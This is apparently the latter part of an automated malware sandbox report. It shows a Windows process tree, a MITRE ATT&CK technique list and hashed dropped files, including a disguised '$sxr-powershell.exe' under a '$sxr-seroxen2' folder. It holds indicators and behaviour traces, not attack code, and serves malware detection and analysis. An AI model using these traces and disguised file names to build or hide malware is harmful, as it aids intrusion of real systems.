                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                        1⤵
                                                                                                        • Drops file in System32 directory
                                                                                                        PID:1720
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                        1⤵
                                                                                                          PID:4384
                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:3556
                                                                                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                            C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                            1⤵
                                                                                                              PID:2092
                                                                                                            • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                              "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.Accounts.AppXqe94epy97qwa6w3j6w132e8zvcs117nd.mca
                                                                                                              1⤵
                                                                                                                PID:4760
                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 4760 -s 952
                                                                                                                  2⤵
                                                                                                                  • Checks processor information in registry
                                                                                                                  • Enumerates system info in registry
                                                                                                                  PID:4384
                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                1⤵
                                                                                                                • Modifies registry class
                                                                                                                PID:5048
                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                1⤵
                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                PID:2932
                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                  C:\Windows\system32\WerFault.exe -pss -s 468 -p 4760 -ip 4760
                                                                                                                  2⤵
                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                  PID:1532
                                                                                                              • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                1⤵
                                                                                                                  PID:3460
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                  1⤵
                                                                                                                    PID:2228
                                                                                                                  • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                    "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                    1⤵
                                                                                                                      PID:4684
                                                                                                                    • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                      "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                      1⤵
                                                                                                                        PID:2108
                                                                                                                      • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                        "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                        1⤵
                                                                                                                          PID:4320

                                                                                                                        Network

                                                                                                                        MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                        Execution

                                                                                                                        Scheduled Task/Job

                                                                                                                        1
                                                                                                                        T1053

                                                                                                                        Persistence

                                                                                                                        Scheduled Task/Job

                                                                                                                        1
                                                                                                                        T1053

                                                                                                                        Privilege Escalation

                                                                                                                        Scheduled Task/Job

                                                                                                                        1
                                                                                                                        T1053

                                                                                                                        Discovery

                                                                                                                        Query Registry

                                                                                                                        3
                                                                                                                        T1012

                                                                                                                        System Information Discovery

                                                                                                                        2
                                                                                                                        T1082

                                                                                                                        Command and Control

                                                                                                                        Web Service

                                                                                                                        1
                                                                                                                        T1102

                                                                                                                        Replay Monitor

                                                                                                                        Loading Replay Monitor...

                                                                                                                        Downloads

                                                                                                                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WER.6e1f0f53-e47a-4d41-9442-370388ef1bc4.tmp.txt
                                                                                                                          Filesize

                                                                                                                          13KB

                                                                                                                          MD5

                                                                                                                          4e89c4a59d7721cffa9b96b103ae5999

                                                                                                                          SHA1

                                                                                                                          64c99f2550dc39098d75e025d6dbcef86eea7d78

                                                                                                                          SHA256

                                                                                                                          80babee3a9d27799104e3043e8cb667c2bcc1f221ae174049551c8883b9b82a4

                                                                                                                          SHA512

                                                                                                                          c98cd7f1f61153848682e44901c8d8a5192274d135fb68f48a7569b7bb5ca4baa0d0aff1f978f7ababf471949fae527a82952bb06aa28b870382b02698f927ce

                                                                                                                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WER.d1abe589-d2bc-4764-adf8-72ece2aecd78.tmp.csv
                                                                                                                          Filesize

                                                                                                                          34KB

                                                                                                                          MD5

                                                                                                                          c65e78fc8752aef7d93a0390c1e5f112

                                                                                                                          SHA1

                                                                                                                          2bbbd4ce25b744ce5a7332772830111e0a215971

                                                                                                                          SHA256

                                                                                                                          96bcea17975c07628132635d2ad91a2e4a530d9835ec10a2737f64ba3e3080ff

                                                                                                                          SHA512

                                                                                                                          08dd86bfb07fc93acee6da254ab8942c8806370ab6e17b7bb32fbd361fb5d95984e0c741c227d23ea9ecccddced67855e21a91e6f55406e0760ed805a342aa62

                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
                                                                                                                          Filesize

                                                                                                                          404B

                                                                                                                          MD5

                                                                                                                          92416de85e29f170dc673e413d8509b2

                                                                                                                          SHA1

                                                                                                                          fab7804c2a4c13c912fcd9b3844ef4b93d82c22e

                                                                                                                          SHA256

                                                                                                                          2f95aed06c892636a9d312cb0dd55350f87d861b92025dd6f0dd339f1c619b74

                                                                                                                          SHA512

                                                                                                                          52ed95ad5dc27d45152c992d8d19007fa47306930c52c77db06468baf70c4023540fb4826b2418d004b2c20b608100c533ae0b0e1b1e975357dd59174196c735

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                                          Filesize

                                                                                                                          162KB

                                                                                                                          MD5

                                                                                                                          152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                          SHA1

                                                                                                                          c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                          SHA256

                                                                                                                          a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                          SHA512

                                                                                                                          2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                                        • C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
                                                                                                                          Filesize

                                                                                                                          409KB

                                                                                                                          MD5

                                                                                                                          7417c8c73e614f293152575f46134216

                                                                                                                          SHA1

                                                                                                                          cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805

                                                                                                                          SHA256

                                                                                                                          00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3

                                                                                                                          SHA512

                                                                                                                          897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0

                                                                                                                        • C:\Windows\Temp\__PSScriptPolicyTest_c3hqlgcd.q0g.ps1
                                                                                                                          Filesize

                                                                                                                          60B

                                                                                                                          MD5

                                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                          SHA1

                                                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                          SHA256

                                                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                          SHA512

                                                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                        • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                          Filesize

                                                                                                                          338B

                                                                                                                          MD5

                                                                                                                          aa1d436b9bbfd79fcdc72e20ae6bce3d

                                                                                                                          SHA1

                                                                                                                          7018b5023571192ffe0d772be77b9d2565ddf5ff

                                                                                                                          SHA256

                                                                                                                          9aeb35fab430f2dd746034044fc25197013e8becae3dbba5e530c3a5acc707ae

                                                                                                                          SHA512

                                                                                                                          de7ad221c9d4ad774c205e3c3c82c49269ac03aaa4ed558e44d550013153f9c427882e3a9e6a06caee75605bd5892054f0edc74683ffcb58c1d03acd8ac7b521

                                                                                                                        • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9
                                                                                                                          Filesize

                                                                                                                          420B

                                                                                                                          MD5

                                                                                                                          483053ac8e41bf20d92ca0d33f62983a

                                                                                                                          SHA1

                                                                                                                          1318711287df601dbf3a4ecc68f341b3fc4251ed

                                                                                                                          SHA256

                                                                                                                          45e2e6168d27cc4da2a3ee9e897b62aeb80ca28357e7f70cfd47105e60dd7a7c

                                                                                                                          SHA512

                                                                                                                          b07dda4dfc235f0273e4da596597a455b2ca3b1b9e7e4ed53c35f67ebe4b3b13401c9b2a8856e1b1db3282db3c4153df16ea951296814c581ba9b5dab0ffc5d6

                                                                                                                        • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
                                                                                                                          Filesize

                                                                                                                          2KB

                                                                                                                          MD5

                                                                                                                          5f4c933102a824f41e258078e34165a7

                                                                                                                          SHA1

                                                                                                                          d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

                                                                                                                          SHA256

                                                                                                                          d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

                                                                                                                          SHA512

                                                                                                                          a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

                                                                                                                        • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                          Filesize

                                                                                                                          104B

                                                                                                                          MD5

                                                                                                                          9f351cb7e50bc4e1abbfab0d96d2cc5d

                                                                                                                          SHA1

                                                                                                                          62ffebf4d30ae0fae9de23d46e444b8829e2158a

                                                                                                                          SHA256

                                                                                                                          a675d8b398769584ebe8100807cb712877a2a44a0de8e7a8b35c575461c42f8c

                                                                                                                          SHA512

                                                                                                                          1fc5be1d0272d5852f7effff9a8f96c15c475287c014ac5e3394dfbfc900e65864f16756708afd124d24ab9e28d56dd81599d17a0d5b3bc5064022746fd4aae4

                                                                                                                        • memory/468-99-0x00007FF82FE10000-0x00007FF82FE20000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/468-92-0x000001D7D6CB0000-0x000001D7D6CDB000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/468-98-0x000001D7D6CB0000-0x000001D7D6CDB000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/564-1289-0x0000000074B70000-0x0000000075321000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/564-13-0x0000000074B70000-0x0000000075321000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/564-14-0x0000000074B70000-0x0000000075321000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/564-1290-0x0000000074B70000-0x0000000075321000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/564-34-0x0000000006B10000-0x0000000006B1A000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          40KB

                                                                                                                        • memory/648-66-0x00007FF82FE10000-0x00007FF82FE20000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/648-57-0x0000027EE2F60000-0x0000027EE2F85000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          148KB

                                                                                                                        • memory/648-59-0x0000027EE2F90000-0x0000027EE2FBB000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/648-65-0x0000027EE2F90000-0x0000027EE2FBB000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/648-58-0x0000027EE2F90000-0x0000027EE2FBB000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/704-70-0x000001AFD7F50000-0x000001AFD7F7B000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/704-76-0x000001AFD7F50000-0x000001AFD7F7B000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/704-77-0x00007FF82FE10000-0x00007FF82FE20000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/924-103-0x00000253A7890000-0x00000253A78BB000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/996-88-0x00007FF82FE10000-0x00007FF82FE20000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/996-87-0x0000021F3C730000-0x0000021F3C75B000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/996-81-0x0000021F3C730000-0x0000021F3C75B000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/1064-48-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/1064-46-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/1064-47-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/1064-49-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/1064-51-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/1064-54-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/1064-53-0x00007FF86EA90000-0x00007FF86EB4D000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          756KB

                                                                                                                        • memory/1064-52-0x00007FF86FD80000-0x00007FF86FF89000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          2.0MB

                                                                                                                        • memory/2012-4-0x0000000074B70000-0x0000000075321000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/2012-0-0x0000000074B7E000-0x0000000074B7F000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/2012-20-0x0000000074B70000-0x0000000075321000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/2012-7-0x00000000069F0000-0x0000000006A2C000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          240KB

                                                                                                                        • memory/2012-6-0x00000000064C0000-0x00000000064D2000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          72KB

                                                                                                                        • memory/2012-5-0x0000000005880000-0x00000000058E6000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          408KB

                                                                                                                        • memory/2012-3-0x00000000057C0000-0x0000000005852000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          584KB

                                                                                                                        • memory/2012-2-0x0000000005CD0000-0x0000000006276000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          5.6MB

                                                                                                                        • memory/2012-1-0x0000000000C60000-0x0000000000CCC000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          432KB

                                                                                                                        • memory/2228-44-0x00007FF86FD80000-0x00007FF86FF89000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          2.0MB

                                                                                                                        • memory/2228-43-0x000001BBFE670000-0x000001BBFE69A000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          168KB

                                                                                                                        • memory/2228-29-0x000001BBFE2C0000-0x000001BBFE2E2000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          136KB

                                                                                                                        • memory/2228-45-0x00007FF86EA90000-0x00007FF86EB4D000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          756KB